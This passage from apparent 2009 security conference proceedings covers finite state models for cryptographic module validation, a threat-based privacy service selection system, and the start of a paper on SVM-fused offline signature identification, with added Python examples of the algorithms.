- Nowadays, the FSM is not sufficiently covered by the cryptographic module validation guidance. So we developed a method and an FSM creation tool that make it easy to build an FSM. Thus, the method for FSM specification helps vendors and evaluators.
- The FSM can be used as a requirements specification language together with UML, which requires related work (e.g., class diagram, use case diagram, etc.).
- In the future, we will help vendors and evaluators through the development of automatic FSM creation tools. And we will also develop FSM attribute validation tools.
References
1. NIST FIPS PUB 140-2, Security Requirements for Cryptographic Modules (May 2001)
2. NIST FIPS PUB 140-3 (Draft), Security Requirements for Cryptographic Modules (July 2007)
3. Derived Test Requirements (DTR) for FIPS 140-2, Security Requirements for Cryptographic Modules (June 2004)
4. Cryptographic Module Validation Program, http://csrc.nist.gov/group/STM/cmvp/index.html
5. Japan Cryptographic Module Validation Program, http://www.ipa.go.jp/security/english/jcmvp.html
6. Pap, Z., et al.: Method of Checking General Safety Criteria in UML Statechart Specification. Reliability Engineering & System Safety 87, 89–107 (2005)
7. Pap, Z., et al.: Completeness and Consistency Analysis on UML Statechart Specification. In: Proc. IEEE Design and Diagnostics of Electronic Circuit and System Workshop (DDECS 2001) (May 2001)
8. Korea IT Security Certification Center, http://www.kecs.go.kr
9. Watson, A., McCabe, T.: NIST SP 500-235, Structured Testing: A Testing Methodology Using the Cyclomatic Complexity Metric (September 1996)
10. StarUML Project, http://staruml.sourceforge.net/ko/index.php
A Privacy-Aware System Using Threat-Based Evaluation and Feedback Method in Untrusted Ubiquitous Environments Yuan Tian, Biao Song, and Eui-Nam Huh Department of Computer Engineering Kyung Hee University Global Campus, South Korea [email protected], [email protected], [email protected]
Abstract. Privacy, the most often-cited criticism, concerns more and more users who need services. In most cases, users cannot anticipate the hazards caused by disclosed data, for lack of specialist knowledge, unless they know the potential threat beforehand. Besides, users also hope their data can be disclosed in a minimal way so that the potential threats to their data are reduced as much as possible. To address this problem, this paper presents a threat-based model for privacy data management. A key feature of our proposed model is that it allows users to customize services on the basis of their consent to the potential threats. Furthermore, a user can select the best service from a trustable company with reference to other users' feedback. To evaluate the proposed system, three simulations for selecting optimal services are performed in this research.
Keywords: Privacy, Threat, Purpose.
1 Introduction
Information privacy has constantly been in the spotlight in recent years. As modern technology makes it easy to collect and preserve people's data, the protection of user privacy has become a critical issue and has been discussed in different ways. The concept of privacy is defined by Jones [1] as "… not having things known about you that you don't choose to have known, or at least you know that they are known and by whom." We must consider privacy before the development process, and thus avoid expensive errors in the deployed system [2]. Not surprisingly, many privacy-aware technologies have been devoted to facilitating the management of users' privacy data. A survey by the Federal Trade Commission [9] shows that nearly all web sites collect users' names, mobile numbers, and other identifying information, which creates the potential for disclosure of users' personal information. At the same time, some users voluntarily provide information to social networking sites such as Facebook, in order to stay up-to-date with developments in their lives. But it is hard for them to retain privacy and benefit from these web services at the same time. In order to meet the growing requirements for privacy management, many privacy technologies have been proposed. Among them, the issue most related to our work is
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 193–200, 2009. © Springer-Verlag Berlin Heidelberg 2009
194
Y. Tian, B. Song, and E.-N. Huh
the purpose [3, 4]. The basic concept of purpose is the reason for which information is being collected and processed. As a key element of privacy data management, a purpose sets a boundary on data processing to control the intended usage of data. On the basis of purpose, a Hippocratic database [5] was proposed by R. Agrawal et al., which stores purpose in the database as an attribute specifying the reason for which a piece of information can be used. The mechanism of the Hippocratic database was extended by F. Massacci et al. [8], who use goal-oriented approaches [6] to organize purposes into AND/OR tree hierarchies by modeling and analyzing purposes in Hippocratic databases. They assume "customers could be able to understand how their personal data will be used and, in case they agree, disclose them". However, in an untrusted ubiquitous environment, we believe that users cannot set costs (penalties) on the data elements by themselves, for lack of specialist knowledge, unless they know the potential threat beforehand. Besides, users hope their data can be disclosed in a minimal way since the more data is disclosed, the more threats they have to endure. Thus, in this paper, a technical privacy-aware model based on threat analysis is presented. In our proposed system, users specify their privacy preferences by setting penalty values on potential threats. Moreover, another contribution of our work is that it provides feedback about the companies from different users, which allows an optimal service to be supplied to the user from a trusted company with minimal data disclosure. Using the Analytic Hierarchy Process (AHP) approach [7], a comparison between each pair of threats is made to evaluate which service suits the user's needs properly. Besides, we organize threats through an AND/OR refinement to calculate the importance of each data element, and the service with minimal data disclosure is found through a reverse AND/OR refinement.
Compared with existing approaches, which let users set penalty values on data elements directly, our approach is an improvement since it provides an intuitive way to measure the effect caused by privacy data disclosure. The remainder of the paper is organized as follows. In Section 2, we present the architecture of the proposed system. Section 3 gives details of the related schemes used in the system, and a running example is provided to demonstrate how the system works. Finally, the conclusion is discussed in Section 4.
2 Architecture of the Proposed System
The functionality of the threat-based privacy preservation system is to provide users with an optimal service that ensures minimum hazard from potential data disclosure. It is achieved by three components: the Threat Evaluation (TE) engine, the Data Evaluation (DE) engine and the Service Evaluation (SE) engine. The architecture of the proposed system is shown in Fig. 1. The TE engine presents what potential threats will arise from a privacy data disclosure. First, system administrators define the types of potential threats and store them in the TE engine. Each threat consists of the related data elements and a description of the hazard. We organize these threats using AND/OR tree hierarchies to specify which data elements are under such threats. A clear description of a potential threat helps users realize clearly what consequences they have to suffer from the related data disclosure. Users
A Privacy-Aware System Using Threat-Based Evaluation and Feedback Method
195
Fig. 1. Threat-based Privacy Preservation System
can express their privacy preferences by setting threat penalty values using the AHP approach. Users store their privacy preferences in the TE engine, which uses them to judge the importance of the data elements, and they can access or modify their preferences at any time. Besides, in the TE engine, users are allowed to report the threats which they faced in the provided services. The threat penalty values are decomposed into data penalty values through the AND/OR refinements mentioned above. Then,
- If threat t with penalty value P(t) is AND-decomposed into data elements d_1, ..., d_n, then each data element gets a cumulative penalty value P(t)/n.
- If threat t with penalty value P(t) is OR-decomposed into data sets d_1, ..., d_n, then each data set gets a cumulative penalty value P(t). By using AND-decomposition, the penalty value of each data set can then be distributed to data elements.
In fact, AND-decomposition represents the occurrence of a threat that is caused by disclosing a set of data elements simultaneously, while OR-decomposition denotes alternative data disclosures that produce the same threat. The DE engine then sums up the cumulative penalty values of each data element and produces a final penalty value for each one. The SE engine provides an interface for companies that allows them to declare the data required by the services they provide. Based on the penalty values of the data elements, the SE engine calculates penalty values for the services and provides the results to the user. Also, based on the feedback supplied by users in the TE engine, the SE engine automatically maps the threat(s) to the company which supplies these services. According to the user's individual estimates for threats, the service with the minimum penalty value is provided and results in minimal hazard to the user. Thus, the privacy concerns of services can be customized, while maximal privacy protection is guaranteed because the services are evaluated and ranked with threat penalty as the criterion.
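To make the two decomposition rules concrete, here is an added Python example that is not part of the paper: threats with constructed names and penalty values are decomposed through nested AND/OR refinements, and the per-data-element sums are accumulated as the DE engine does. The service_penalty function rests on an assumption the page does not state, namely that a service's penalty is the company's danger coefficient multiplied by the sum of the penalties of the data elements it requires; under that assumption it reproduces, for instance, the Table 6 value for Notification by Email from the Table 3 and Table 5 figures (1.2 × 0.0526 = 0.0631).

```python
# Added example (not the paper's TE/DE engine code): decompose threat penalties
# into data-element penalties through nested AND/OR refinements and sum them.

# A refinement node is either a data element (str) or ("AND", children) /
# ("OR", children); children may nest.  Threat names and penalty values are
# constructed for this example and are not the paper's Table 1 or Table 2.
THREATS = {
    "junk mail":      (0.3, ("AND", ["Name", "Home Address"])),
    "phone spam":     (0.6, ("OR",  ["Telephone Number", "Cellphone Number"])),
    "identity abuse": (0.9, ("OR",  [("AND", ["Name", "Credit Card Number"]),
                                     ("AND", ["Name", "Email Address", "Zipcode"])])),
}


def distribute(node, penalty, acc):
    """Push `penalty` down the refinement tree rooted at `node` into `acc`."""
    if isinstance(node, str):                 # leaf: a data element
        acc[node] = acc.get(node, 0.0) + penalty
        return
    kind, children = node
    if kind == "AND":                         # AND: each of n children gets P(t)/n
        for child in children:
            distribute(child, penalty / len(children), acc)
    elif kind == "OR":                        # OR: every alternative gets the full P(t)
        for child in children:
            distribute(child, penalty, acc)
    else:
        raise ValueError("unknown refinement kind: %r" % kind)


def data_penalties(threats):
    """DE-engine step: cumulative penalty per data element over all threats."""
    acc = {}
    for penalty, tree in threats.values():
        distribute(tree, penalty, acc)
    return {element: round(value, 4) for element, value in acc.items()}


def service_penalty(required_elements, penalties, danger_coefficient):
    """Assumption, not stated on this page: a service's penalty is the company's
    danger coefficient (Table 5) times the sum of the penalties of the data
    elements it requires (Tables 3 and 4)."""
    return round(danger_coefficient * sum(penalties[e] for e in required_elements), 4)


if __name__ == "__main__":
    for element, value in sorted(data_penalties(THREATS).items(), key=lambda kv: kv[1]):
        print("%-20s %.4f" % (element, value))
```

Note how "Name" accumulates from three refinements (0.15 + 0.45 + 0.3 = 0.9), mirroring the way the page's "Home Address" value 0.1755 is the sum of contributions from two threats.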
3 System Design
3.1 Evaluating the Penalty Value of a Single Service
In this section, we first present an example showing the threats, services, related data elements and providers. Then we assume there is a user who has evaluated the threats. Using the evaluation method we proposed in another paper [10], the penalty value of each single service can be obtained. For simplicity, only a few threats are defined in this example. Suppose Jim wants to select notification services which will not bring many awful potential hazards to him. First, he is informed that there are five possible threats that may occur after providing his privacy data to the service providers. Those threats are listed in Table 1.
Table 1. List of Threats
Then he sets correlated penalty values for each pair of threats, which are shown in Table 2. After the mapping process, the penalty values of the data elements are calculated and shown in Table 3. The related data element "Home Address" has the penalty value
Table 2. Correlated Penalty Values
Table 3. Penalty Values of Data Elements
Related Data Element    Penalty Value
Email Address           0.0526
Home Address            0.1755
Telephone Number        0.4737
Cellphone Number        0.7316
Credit Card Number      0.3682
Name                    0.0702
Zipcode                 0.0702
0.1755, which comes from the value 0.0702 in the JL threat and 0.1053 in the JE threat. The penalty value of "Cellphone Number" is also a cumulative value, which combines 0.4737 and 0.1579. Table 4 presents seven available services provided by multiple companies, together with the required data elements.
Table 4. Required Data Elements for Available Services
Service                  Company    Data Element
Delivery by post         UUP        Name, Zipcode, Home Address
Door-to-door delivery    MMS        Name, Home Address
Notification by phone    Noto       Name, Cellphone/Telephone Number
Notification by Email    Noto       Email Address
Payment1                 Paymate    Credit Card Number
Payment2                 Epay       Credit Card Number
Purchase                 Emarket    Name, Email Address
The danger coefficient value of each company is given in Table 5.
Table 5. Danger Coefficient Values of Companies (Cr)
Company    Danger Coefficient Value
UUP        1.1
MMS        1.3
Noto       1.2
Paymate    1.2
Epay       1.1
Emarket    1.3
In Table 6, the penalty value of each service from the different companies is presented. We rank the values from low to high, where the service with the lowest value is the most reliable, and vice versa.
Table 6. Credibility Rank of Services Provided by Each Company
Service                  Company    Penalty Value
Notification by Email    Noto       0.0631
Purchase                 Emarket    0.1696
Door-to-door delivery    MMS        0.3194
Delivery by post         UUP        0.3365
Payment2                 Epay       0.4050
Payment1                 Paymate    0.4418
Notification by phone    Noto       0.6527
3.2 Basic Definitions for Hypergraph
So far, we have discussed the process that delivers a single desired service to the user with the smallest privacy penalty. On the basis of this technique, we use a goal-oriented approach to find customized privacy policies in a complex service delivery environment. A directed hypergraph, called the service composition graph (SCG), is applied to address the topology and service composition issues among different companies. We select the FD-graph, which is “a labeled graph with two kinds of nodes and two kinds of edges where decomposition arcs are mapped into nodes and the two types of arcs connect the decomposition node to the original nodes” [4]. The following definitions are based on [4].

Definition 1. Given a SCG $H = \langle N, A \rangle$, where $N$ is a set of nodes and $A$ is a set of arcs, there exist two types of arcs: $A_{or}$ is the set of OR-arcs representing OR-decompositions and $A_{and}$ is the set of AND-arcs representing AND-decompositions, so that $A = A_{or} \cup A_{and}$. Two types of nodes can also be found in a SCG: $N_s \equiv S$ is the set of simple nodes and $N_c$ is the set of compound nodes, which gather the predecessor nodes of incoming OR-arcs, so that $N = N_s \cup N_c$. Thus the SCG can also be written as $H = \langle N_s \cup N_c,\, A_{or} \cup A_{and} \rangle$. In the sequel, we use $x$ for simple nodes, $y$ for compound nodes and $z$ for either simple or compound nodes.

Definition 2. Let $P(x)$ be the penalty value of $x$ and $P(y)$ the penalty value of $y$. Then $P(x) = P(s_x)$ and $P(y) = 0$, where $s_x$ is the service represented by $x$.

Definition 3. Let $MP(x)$ be the minimum penalty value up to $x$ and $MP(y)$ the minimum penalty value up to $y$. Then

$$MP(x) = \sum_{z} MP(z) + P(x),$$

where $z$ ranges over the predecessor nodes of $x$, and

$$MP(y) = \min_{z} \{ MP(z) \},$$

where $z$ ranges over the predecessor nodes of $y$. In a SCG we fix one starting node $z_0$ with $MP(z_0) = 0$. The optimization goal is to find a shortest path and calculate the minimum penalty value up to the goal node. The services on the shortest path are selected as the customized composition of services for the user.

3.3 Services Selection
Figure 2 shows an example of a service composition graph. The final service is “Purchase”, which is provided by the company “Emarket”.
Fig. 2. Services Composition Graph
It is a combination of the services “Delivery”, “Payment” and “Notification”. “Delivery” can be achieved through the “Delivery by post” service or the “Door-to-door delivery” service, provided by the companies “UUP” and “MMS” respectively. The user can select the “Payment” service from the company “Epay” or “Paymate”. In the case of “Notification”, the company “Noto” is the only service provider, but it offers two alternative services: “Notification by phone” and “Notification by Email”. Now we assume that the user has set the penalty values for the above services as given in Table 6. The MinPenalty algorithm is then applied to minimize the privacy cost and select the best services for that user. The selection results are given in Table 7.

Table 7. Final Selection Results

Service                 Company   Penalty Value
Notification by Email   Noto      0.0631
Purchase                Emarket   0.1696
Door-to-door delivery   MMS       0.3194
Payment2                Epay      0.4050
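As an added example that is not part of the paper, the following Python code evaluates Definitions 2 and 3 on the composition graph described for Fig. 2 and reproduces the selection of Table 7. The node naming ("service@company"), the AND/OR encoding of the graph and the memoized recursion are this example's own assumptions; the penalty values are the ones listed in Table 6.

```python
# Added example (not the paper's code): MinPenalty on the service composition graph.
# Simple node x = one service offered by one company, with penalty P(x) from Table 6.
# Compound node y ("Delivery", "Payment", "Notification") has P(y) = 0 and gathers
# the alternatives reachable through OR-arcs. "Purchase" is an AND-decomposition
# because it needs a delivery, a payment and a notification service.

PENALTY = {
    "Notification by Email@Noto": 0.0631,
    "Purchase@Emarket": 0.1696,
    "Door-to-door delivery@MMS": 0.3194,
    "Delivery by post@UUP": 0.3365,
    "Payment2@Epay": 0.4050,
    "Payment1@Paymate": 0.4418,
    "Notification by phone@Noto": 0.6527,
}

# node -> (decomposition type, predecessor nodes); structure assumed from the prose
SCG = {
    "Purchase@Emarket": ("AND", ["Delivery", "Payment", "Notification"]),
    "Delivery": ("OR", ["Delivery by post@UUP", "Door-to-door delivery@MMS"]),
    "Payment": ("OR", ["Payment1@Paymate", "Payment2@Epay"]),
    "Notification": ("OR", ["Notification by phone@Noto", "Notification by Email@Noto"]),
}


def min_penalty(goal, scg=SCG, penalty=PENALTY):
    """Return (MP(goal), selected simple nodes) following Definition 3.

    MP(x) = sum of MP(z) over the predecessors z, plus P(x)   (AND node)
    MP(y) = min of MP(z) over the predecessors z               (OR node, P(y) = 0)
    Leaves have no predecessors, so they play the role of the start node z0.
    """
    memo = {}

    def mp(node):
        if node in memo:
            return memo[node]
        kind, preds = scg.get(node, ("AND", []))
        own = penalty.get(node, 0.0)            # P(y) = 0 for compound nodes
        chosen = [node] if node in penalty else []
        if kind == "AND":
            total = own
            for z in preds:
                value, path = mp(z)
                total += value
                chosen = chosen + path
        elif kind == "OR":
            if not preds:
                raise ValueError("OR node %r has no alternatives" % node)
            best = min(preds, key=lambda z: mp(z)[0])
            value, path = mp(best)
            total = own + value
            chosen = chosen + path
        else:
            raise ValueError("unknown decomposition %r" % kind)
        memo[node] = (total, chosen)
        return memo[node]

    return mp(goal)


def composition_table(goal):
    """Rows (service, company, penalty) of the selected composition, cheapest first."""
    _, chosen = min_penalty(goal)
    rows = [(n.split("@")[0], n.split("@")[1], PENALTY[n]) for n in chosen]
    return sorted(rows, key=lambda r: r[2])


if __name__ == "__main__":
    total, _ = min_penalty("Purchase@Emarket")
    for service, company, p in composition_table("Purchase@Emarket"):
        print("%-24s %-8s %.4f" % (service, company, p))
    print("minimum penalty up to the goal: %.4f" % total)
```

Running it selects Notification by Email (Noto), Purchase (Emarket), Door-to-door delivery (MMS) and Payment2 (Epay), i.e. the rows of Table 7, with a total penalty of 0.9571 up to the goal node. Because every node is memoized, the evaluation is linear in the size of the graph even when a compound node is shared by several AND-decompositions.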
4 Conclusion

This paper presents a privacy preservation system for data management based on an analysis of the potential threats. The key contribution of our work is overcoming the limitation that users cannot foresee the hazards caused by disclosed data. The proposed system permits the user to set reasonable penalties on potential threats that were previously defined by the system administrator, and thus constitutes a shield for individuals’ private data that ensures an optimal service with minimal data disclosure. In addition, we provide a way for the user to choose the most suitable service from a trustworthy company by taking other users’ feedback into account. Finally, experimental results are given to evaluate the proposed system.
Acknowledgment

This research was supported by the MKE (Ministry of Knowledge Economy), Korea, under the ITRC (Information Technology Research Center) support program supervised by the IITA (Institute of Information Technology Advancement) (IITA2009-C1090-0903-0011).
References

1. Jones, K.S.: Privacy: What’s different now? Interdiscip. Sci. Rev. 28(4), 287–292 (2003)
2. Guarda, P., Zannone, N.: Towards the development of privacy-aware systems. Information and Software Technology, pp. 337–350. Butterworth-Heinemann, Newton (2009)
3. Byun, J., Bertino, E., Li, N.: Purpose based access control of complex data for privacy protection. In: Symposium on Access Control Models and Technologies, pp. 102–110. ACM, New York (2005)
4. Byun, J.-W., Li, N.: Purpose Based Access Control for Privacy Protection in Relational Database Systems. The VLDB Journal 17(4), 603–619. Springer, Heidelberg (2008)
5. Agrawal, R., Kiernan, J., Srikant, R., Xu, Y.: Hippocratic databases. In: Proceedings of the 28th VLDB Conference, Hong Kong, China, pp. 143–154 (2002)
6. Bresciani, P., Giorgini, P., Giunchiglia, F., Mylopoulos, J., Perini, A.: TROPOS: An agent-oriented software development methodology. JAAMAS 8(3), 203–236 (2004)
7. Lin, C.-C., Wang, W.-C., Yu, W.-D.: Improving AHP for construction with an adaptive AHP approach (A3). Automation in Construction 17(2), 180–187 (2008)
8. Massacci, F., Mylopoulos, J., Zannone, N.: Hierarchical hippocratic databases with minimal disclosure for virtual organizations. Springer, Heidelberg
9. Federal Trade Commission: Privacy online: Fair information practices in the electronic marketplace: A report to congress (May 2000), http://www.ftc.gov/reports/privacy2000/privacy2000.pdf
10. Tian, Y., Song, B., Huh, E.-N.: A Threat-based Privacy Preservation System in Untrusted Environment (in press)
Fusion of Multiple Matchers Using SVM for Offline Signature Identification

Dakshina Ranjan Kisku1, Phalguni Gupta2, and Jamuna Kanta Sing3
1 Department of Computer Science and Engineering, Dr. B.C. Roy Engineering College, Durgapur – 713206, India
2 Department of Computer Science and Engineering, Indian Institute of Technology Kanpur, Kanpur – 208016, India
3 Department of Computer Science and Engineering, Jadavpur University, Kolkata – 700032, India
{drkisku, jksing}@ieee.org, [email protected]
Abstract. This paper uses Support Vector Machines (SVM) to fuse multiple classifiers for an offline signature system. Global and local features are extracted from the signature images, and the signatures are verified with the help of classifiers based on the Gaussian empirical rule, the Euclidean distance and the Mahalanobis distance. An SVM is used to fuse the matching scores of these matchers. Finally, a query signature is recognized by comparing it with all signatures in the database. The proposed system is tested on a signature database containing 5400 offline signatures of 600 individuals and the results are found to be promising.

Keywords: Offline Signature Verification, Biometric Classifiers, Global and Local features, Distance Metrics, Support Vector Machines.
1 Introduction

The use of biometric technologies [1] for human identity verification is growing rapidly and is advancing towards usable biometric security artifacts. Offline signature verification [2], [3] is considered a behavioral biometric trait in the field of security and fraud prevention. Compared with other biometric traits such as fingerprint [4], face [7], palmprint [6] and iris [5], offline signature verification [2], [3] has the advantage of wide acceptance. A significant amount of work on offline signature recognition is available to detect forgeries and to reduce the identification error. For example, a signature verification system using static and dynamic features with SVM-based classification is presented in [8]. Different types of global features and a feed-forward neural network are used in [9]. In [3], an offline Arabic signature verification system based on global and local features and multistage classifiers has been proposed. In [10], distance probability distributions, Naïve-Bayes and SVM classifiers have been used for verification. This paper presents offline signature identification by fusion of three classifiers using SVM [11], [12]. Three classifiers, namely the Mahalanobis distance, the Euclidean distance and the Gaussian empirical rule [13] derived from the Gaussian distribution, are

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 201–208, 2009. © Springer-Verlag Berlin Heidelberg 2009
D.R. Kisku, P. Gupta, and J.K. Sing
fused to produce a quality matching score using support vectors. The aim of this fusion classifier is to reduce the error rates in terms of skilled forgery detection [2] with low computational complexity. The overall performance depends on the quality of the matching scores produced by the individual matchers. Due to the lack of uniformity of the individual classifiers, performance and accuracy are often degraded. To overcome this non-uniformity, we present a fusion strategy based on the SVM that produces quality matching scores by fusing the individual matchers. The paper is organized as follows. The next section deals with the extraction of global and local features from offline signatures. Section 3 introduces the three classifiers used for verification and matching score generation. Fusion of the three classifiers by SVM at the matching score level is discussed in Section 4. Section 5 presents experimental results and concluding remarks are given in the last section.
2 Preprocessing of Offline Signatures and Feature Extraction

2.1 Preprocessing Operations

In order to improve the performance of the system, a few preprocessing operations [3] are carried out on the offline signatures. To recognize a person correctly and identify impostors through offline signatures, image enhancement operations are applied to the raw signature images. The acquired signature images may contain extra pixels as noise, caused by problems during scanning or by signatures not being in proper form. These extra pixels must be removed from the signatures; otherwise the signature may not be recognized correctly. To extract global and local features [3] from the preprocessed signatures, image enhancement and morphological operations such as binarization, smoothing, thinning and high pressure region extraction [14] are applied to the signature images after geometric normalization. Geometric normalization scales the signature image to a standard normalized size using a resize algorithm with nearest neighbor interpolation; it preserves the aspect ratio of the signature image. To remove salt-and-pepper noise and irrelevant data from the signatures, median and mean filters are used. The noise-free signature image is then converted to a binary image using a threshold as discussed in [14]. Extraction of the skeletonised signature can be useful for identification; the Canny edge detector is applied to the binary image to obtain the skeleton of the signature. Finally, we apply an algorithm that can be used to detect skilled forgeries by extracting the regions where the writer puts special emphasis, i.e. the regions of higher ink density. Extraction of the High Pressure Region (HPR) image [14] is of paramount importance for identifying forgeries in signatures; it is obtained by applying thresholds at various fractions of the range between the maximum and minimum gray levels.

We have experimented with three factors, 0.85, 0.55 and 0.75, and found that at a factor of 0.85 the amount of HPR is negligible, while at a factor of 0.55 the HPR image is close to the original image. At a factor of 0.75 we obtained an acceptable HPR image, which can be used for skilled forgery detection together with the other global and local geometric features.
2.2 Global and Local Features Extraction

Selection of discriminative features is crucial for any pattern recognition and classification problem. The proposed system applies three different statistical similarity measurement techniques separately to the extracted feature set consisting of geometric global and local features [3]. Matching scores are obtained from the individual matchers, and these matchers or classifiers are fused using SVM. Global signature features [3] are extracted from the whole signature image, whereas local geometric features [3] are extracted from signature grids; moreover, each grid can be used to extract the same range of global features. The combination of these two types of features is then used to determine the identity of authentic and forged signatures from the database. This set of geometric features is the input to the identification system. In this regard, we consider handwritten signatures taken on a paper template. The main aim of extracting these heuristic geometric global and local features is to transform the signature into a compact feature vector and to support similarity measurements for matching and identification by proper validation.

In the proposed signature identification system, global features are extracted from the signatures. These features describe the signature as a whole, i.e. the global pattern or characteristics of the signature. Global features are extracted from each geometrically normalized, binary, thinned and high pressure region signature image. We summarize the global features that are extracted as follows.

• Width [3]: For a binary signature image, the width is the distance between the two outermost points of the horizontal projection that contain more than 3 pixels of the image.
• Height [3]: The height is the distance between the two outermost points of the vertical projection that contain more than 3 pixels of the binary image.
• Aspect ratio [3]: The aspect ratio is defined as the width to height ratio of a signature.
• Horizontal projection [3]: The horizontal projection is computed from both the binary and the skeletonised image; the number of black pixels is counted along the horizontal projections of the binary and skeletonised signatures.
• Vertical projection [3]: The vertical projection is defined as the number of black pixels obtained from the vertical projections of the binary and skeletonised signatures.
• Area of black pixels [3]: The area of black pixels is obtained by counting the number of black pixels in the binary, thinned and HPR signature images, separately.
• Normalized area of black pixels: The area of black pixels divided by the area (width × height) of the signature; it is calculated from the binary, thinned and HPR images.
• Center of gravity [3]: Obtained by summing the x and y locations of all gray pixels and dividing by the number of pixels counted; the resulting pair of numbers (one for x, one for y) is the center of gravity location.
• Maximum and minimum black pixels in the vertical projection and in the smoothed vertical projection: These are the highest and the lowest frequencies of black pixels in the vertical projection, respectively.
• Maximum and minimum black pixels in the horizontal projection and in the smoothed horizontal projection: These are the highest and the lowest frequencies of black pixels in the horizontal projection, respectively.
Fig. 1. Grid regions of a signature image
• Global baseline [3]: If the vertical projection of the binary signature image has one peak point, the global baseline corresponds to this point; otherwise the global baseline is taken as the median of the two outermost maximum points. In general, the global baseline is defined as the median of the pixel distribution.
• Upper and lower edge limits [3]: The differences between the smoothed and original curves of the vertical projection above and below the baseline are the upper and lower edge limits, respectively.
• Middle zone [3]: The distance between the upper and lower edge limits.
In the next stage, local features [3] are extracted from the gray level, binary, thinned and HPR signature images. Each signature image is divided into 25 equal grid regions. From these grid regions, grid characteristics are estimated as local features, such as the width, height, area of black pixels, normalized area of black pixels, center of gravity, aspect ratio, and horizontal and vertical projections of each grid region. The global features can thus also be computed as local features of each grid region. The grid regions used for local feature extraction are shown in Figure 1. To obtain the complete set of global and local features, we concatenate both feature sets into one feature vector, which is then fed to the classifiers for generating matching scores.
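As an added example that is not the authors' code, the following Python computes the HPR mask of Section 2.1 and the global and grid-based local features of Section 2.2 on a small constructed gray-level image. The paper only sketches the feature definitions, so the concrete rules used here are assumptions of this example: a black pixel is a gray value below 128, "more than 3 pixels" is the cut-off for the columns and rows that bound the width and height, ink is taken as 255 minus the gray value, and the HPR threshold is ink_min + factor × (ink_max − ink_min) over the ink pixels.

```python
# Added example (not from the paper): preprocessing and feature extraction on a
# constructed 12x12 gray-level "signature". Pure Python, no image library needed.


def make_sample():
    """Constructed sample: a thick stroke (gray 50), a lighter flourish (gray 120)
    and a dark high-pressure blob (gray 10) on a white (255) background."""
    img = [[255] * 12 for _ in range(12)]
    for y in range(4, 8):                 # stroke: rows 4..7, columns 1..10
        for x in range(1, 11):
            img[y][x] = 50
    for x in range(3, 9):                 # flourish: row 2, columns 3..8
        img[2][x] = 120
    for y in (5, 6):                      # blob: 2x2 darkest pixels inside the stroke
        for x in (5, 6):
            img[y][x] = 10
    return img


def binarize(gray, threshold=128):
    """1 = black (ink) pixel, 0 = background (assumed fixed threshold)."""
    return [[1 if v < threshold else 0 for v in row] for row in gray]


def hpr_mask(gray, factor=0.75):
    """High pressure region: ink pixels whose darkness reaches
    ink_min + factor * (ink_max - ink_min), computed over the ink pixels only."""
    ink = [[255 - v for v in row] for row in gray]
    inked = [v for row in ink for v in row if v > 0]
    lo, hi = min(inked), max(inked)
    th = lo + factor * (hi - lo)
    return [[1 if v > 0 and v >= th else 0 for v in row] for row in ink]


def projections(binimg):
    """Column counts (horizontal projection) and row counts (vertical projection)."""
    cols = [sum(col) for col in zip(*binimg)]
    rows = [sum(row) for row in binimg]
    return cols, rows


def global_features(binimg, min_pixels=3):
    cols, rows = projections(binimg)
    used_cols = [i for i, c in enumerate(cols) if c > min_pixels]
    used_rows = [i for i, c in enumerate(rows) if c > min_pixels]
    width = used_cols[-1] - used_cols[0] + 1 if used_cols else 0
    height = used_rows[-1] - used_rows[0] + 1 if used_rows else 0
    area = sum(rows)
    xs = [x for row in binimg for x, v in enumerate(row) if v]
    ys = [y for y, row in enumerate(binimg) for v in row if v]
    return {
        "width": width,
        "height": height,
        "aspect_ratio": width / height if height else 0.0,
        "area": area,
        "normalized_area": area / (width * height) if width and height else 0.0,
        "center_of_gravity": (sum(xs) / area, sum(ys) / area) if area else (0.0, 0.0),
        "hproj_max": max(cols), "hproj_min": min(cols),
        "vproj_max": max(rows), "vproj_min": min(rows),
    }


def grid_features(binimg, n=5):
    """Local features: normalized black-pixel area of each of the n x n grid cells."""
    h, w = len(binimg), len(binimg[0])
    cells = []
    for gy in range(n):
        y0, y1 = gy * h // n, (gy + 1) * h // n
        for gx in range(n):
            x0, x1 = gx * w // n, (gx + 1) * w // n
            black = sum(v for row in binimg[y0:y1] for v in row[x0:x1])
            cells.append(black / max(1, (y1 - y0) * (x1 - x0)))
    return cells


def feature_vector(gray):
    """Concatenated global + local features: the matcher input of Section 3."""
    b = binarize(gray)
    g = global_features(b)
    return [g["width"], g["height"], g["aspect_ratio"], g["area"], g["normalized_area"],
            g["center_of_gravity"][0], g["center_of_gravity"][1],
            g["hproj_max"], g["hproj_min"], g["vproj_max"], g["vproj_min"]] + grid_features(b)
```

On the constructed image the HPR mask at factor 0.75 keeps only the four darkest pixels, while at 0.55 it also keeps the whole stroke, which mirrors the behaviour the paper reports for these two factors. The same functions can be applied to the thinned image to obtain the skeleton-based projections and areas listed above.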
3 Matching Scores Generation

Geometric global and local features carry information that is effective for signature recognition. In order to recognize a signature correctly, one uses a feature set that is not only useful for recognition but also generates matching scores. Quality matching scores reflect the relative matching proximity between the instances of a class. To capture the maximum proximity between signature instances, we use three different similarity measurement techniques for generating matching scores: the Euclidean distance, the Mahalanobis distance and the Gaussian empirical rule. Using the concatenated global and local features we maximize the inter-class difference and minimize the intra-class difference.

3.1 Matching Score Generation Using Euclidean Distance

Using the Euclidean distance metric [13], a similarity score between any two feature sets can be obtained from the extracted features. The distance for a pair of signature samples is computed as

$$ED = \frac{1}{n}\left( \sum_{i=1}^{n} C_i \,\frac{(X_i - M_i)^2}{\sigma_i^2} \right)^{1/2} \qquad (1)$$
where $n$ denotes the number of features extracted from a signature instance, $C_i$ is a weight associated with each feature, $X_i$ is the $i$th feature of the query signature, and $M_i$ and $\sigma_i$ are the mean and standard deviation of the $i$th feature calculated over the authentic sample instances.

3.2 Matching Score Generation Using Mahalanobis Distance

The Mahalanobis distance [13] is used to generate matching scores by comparing the query signature with the database signatures; it classifies patterns based on statistical differences. It measures the "similarity" between the feature vector extracted from the query signature and the feature statistics estimated from the database signatures by

$$MD = \sqrt{(f - \mu_x)^T C^{-1} (f - \mu_x)} \qquad (2)$$

where $MD$ is the Mahalanobis distance from the feature vector $f$ to the mean vector $\mu_x$ and $C$ is the covariance matrix of $f$. This can be used in a minimum distance classifier as follows. If $\mu_1, \mu_2, \ldots, \mu_n$ are the means of the $n$ classes and $C_1, C_2, \ldots, C_n$ are the corresponding covariance matrices, a feature vector $f$ is classified by measuring the Mahalanobis distance from $f$ to each of the means and assigning the vector to the class for which the distance is minimum.

